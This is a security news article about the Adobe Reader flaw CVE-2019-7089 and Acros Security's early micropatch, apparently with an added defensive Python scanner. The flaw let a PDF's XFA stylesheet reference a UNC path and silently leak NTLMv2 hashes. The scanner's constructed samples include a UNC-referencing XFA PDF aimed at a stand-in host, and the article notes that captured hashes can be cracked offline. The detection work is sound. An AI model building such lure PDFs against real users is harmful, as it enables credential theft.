by Danny Bradbury
Adobe has patched a flaw that enabled attackers to slurp a user’s network authentication details – but not before someone else patched it first.
Security researcher Alex Inführ discovered a flaw in Adobe Reader that let a malicious PDF file trigger a callback from the program: the compromised reader would contact an attacker-controlled server using Microsoft’s SMB protocol and, as part of the SMB authentication handshake, hand over the user’s Windows credentials in hashed form.
The flaw stemmed from XML Forms Architecture (XFA), an XML structure inside a PDF that lets users fill out forms. When an XFA form loads a remote XML stylesheet from an HTTP(S) URL, Reader asks the user for confirmation before visiting that URL. By giving the stylesheet reference as a Universal Naming Convention (UNC) path instead (\\server\share\file), the attacker can stop that security dialog from appearing: Windows treats the UNC path as a file share, opens an SMB connection to the attacker’s server, and the authentication exchange that follows sends the user’s NTLM (NT LAN Manager) v2 hash to the attacker, with no warning to the user.
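The mechanism above suggests a simple triage check that a defender can run over incoming PDFs: pull out the XFA packet and look for stylesheet references that point at UNC paths rather than http(s) URLs. The scanner below is an added example, not code from the article, from Adobe or from the researcher. It is a heuristic (it regex-matches streams and inflates FlateDecode ones, rather than fully parsing the PDF), and the sample files it scans are constructed inline. The placement of the stylesheet reference in the samples, the `10.0.0.5` host, `example.com` and the `/share/style.xsl` path are assumptions; because the exact element a real sample uses is not reproduced here, the scanner flags any UNC path anywhere inside XFA XML.

```python
import re
import zlib

# Heuristic stream extractor: a PDF dictionary (one level of nesting allowed)
# followed by the stream keyword and the raw stream body. Not a full PDF parser.
STREAM_RE = re.compile(
    rb"(<<(?:[^<>]|<<[^<>]*>>)*>>)\s*stream\r?\n(.*?)\r?\nendstream", re.DOTALL)
# UNC path \\host\share\... ; stops at whitespace, quotes or XML delimiters.
UNC_RE = re.compile(rb"\\\\[A-Za-z0-9._-]+\\[^\s\"'<>?]*")
# href of an xml-stylesheet processing instruction inside the XFA packet.
STYLESHEET_RE = re.compile(rb"<\?xml-stylesheet[^>]*?href=[\"']([^\"']+)[\"']")


def iter_streams(pdf: bytes):
    """Yield (dictionary, decoded body) for every stream in the file."""
    for m in STREAM_RE.finditer(pdf):
        dictionary, body = m.group(1), m.group(2)
        if b"/FlateDecode" in dictionary:
            try:
                body = zlib.decompress(body)
            except zlib.error:
                continue  # damaged or multi-filter stream: skip it
        yield dictionary, body


def looks_like_xfa(body: bytes) -> bool:
    """XFA packets carry the xdp namespace and/or the xfa-template schema."""
    return b"ns.adobe.com/xdp" in body or b"xfa-template" in body


def scan_pdf(pdf: bytes) -> dict:
    """Report stylesheet hrefs and UNC paths found in XFA streams, with a verdict."""
    report = {"xfa_streams": 0, "stylesheet_hrefs": [], "unc_paths": []}
    for _, body in iter_streams(pdf):
        if not looks_like_xfa(body):
            continue
        report["xfa_streams"] += 1
        report["stylesheet_hrefs"] += [h.decode("latin-1") for h in STYLESHEET_RE.findall(body)]
        report["unc_paths"] += [u.decode("latin-1") for u in UNC_RE.findall(body)]
    # A UNC reference is the silent case described in the article; an http(s)
    # stylesheet is worth noting too, but Reader prompts before fetching it.
    if report["unc_paths"]:
        report["verdict"] = "ntlm-leak-candidate"
    elif report["stylesheet_hrefs"]:
        report["verdict"] = "remote-stylesheet"
    else:
        report["verdict"] = "clean"
    return report


# Constructed samples, not the real proof of concept. Where a malicious file
# places the reference is an assumption here, which is why the scanner flags
# any UNC path anywhere in the XFA XML rather than one specific element.
XFA_HEAD = b'<?xml version="1.0"?>\n'
XFA_BODY = (b'<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">'
            b'<template xmlns="http://www.xfa.org/schema/xfa-template/3.3/">'
            b'<subform name="form1"><field name="name"/></subform>'
            b'</template></xdp:xdp>')
XFA_BENIGN = XFA_HEAD + XFA_BODY
XFA_HTTPS = (XFA_HEAD
             + b'<?xml-stylesheet type="text/xsl" href="https://example.com/style.xsl"?>\n'
             + XFA_BODY)
XFA_UNC = (XFA_HEAD
           + b'<?xml-stylesheet type="text/xsl" href="\\\\10.0.0.5\\share\\style.xsl"?>\n'
           + XFA_BODY)


def build_pdf(xfa: bytes, compress: bool = True) -> bytes:
    """Minimal PDF whose AcroForm points at one XFA stream (optionally Flate-compressed)."""
    body = zlib.compress(xfa) if compress else xfa
    filt = b" /Filter /FlateDecode" if compress else b""
    return (b"%PDF-1.7\n"
            b"1 0 obj\n<< /Type /Catalog /AcroForm << /XFA 2 0 R /Fields [] >> >>\nendobj\n"
            b"2 0 obj\n<< /Length " + str(len(body)).encode() + filt + b" >>\nstream\n"
            + body + b"\nendstream\nendobj\n"
            b"trailer\n<< /Root 1 0 R >>\n%%EOF\n")


if __name__ == "__main__":
    for name, xfa in (("benign", XFA_BENIGN), ("https", XFA_HTTPS), ("unc", XFA_UNC)):
        print(name, scan_pdf(build_pdf(xfa)))
```

The verdicts deliberately mirror the article’s distinction: an http(s) stylesheet is reported as `remote-stylesheet` because Reader at least prompts before fetching it, while a UNC reference is reported as `ntlm-leak-candidate` because that is the path that produced no dialog. Real-world PDFs can split the XFA packet across several streams or use other filters, so treat a `clean` verdict from this heuristic as "nothing found", not as proof of safety.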
That’s pretty significant, because what leaks is not a throwaway token: the NTLMv2 value is a challenge-response computed from the NT hash of the user’s Windows password, so an attacker who captures it can run an offline dictionary or brute-force attack against it at leisure and recover the password itself. Various hackers have already detailed methods of cracking the NTLMv2 hash using automated tools.
Adobe released a patch for the flaw yesterday, 12 February 2019, labelling the vulnerability CVE-2019-7089 as a critical sensitive-data-leakage issue. However, security firm Acros Security beat the software vendor to the punch by releasing its own patch on Monday.
Acros’s 0patch service specialises in micropatches, which are applied in memory to the running program rather than by altering the program binary on disk. Micropatches are keyhole surgery, designed to block a specific exploit from compromising a program.
These in-memory patches don’t replace regular software patches, which can make more fundamental structural changes to fix program errors; they’re there to act as a sticking plaster until the …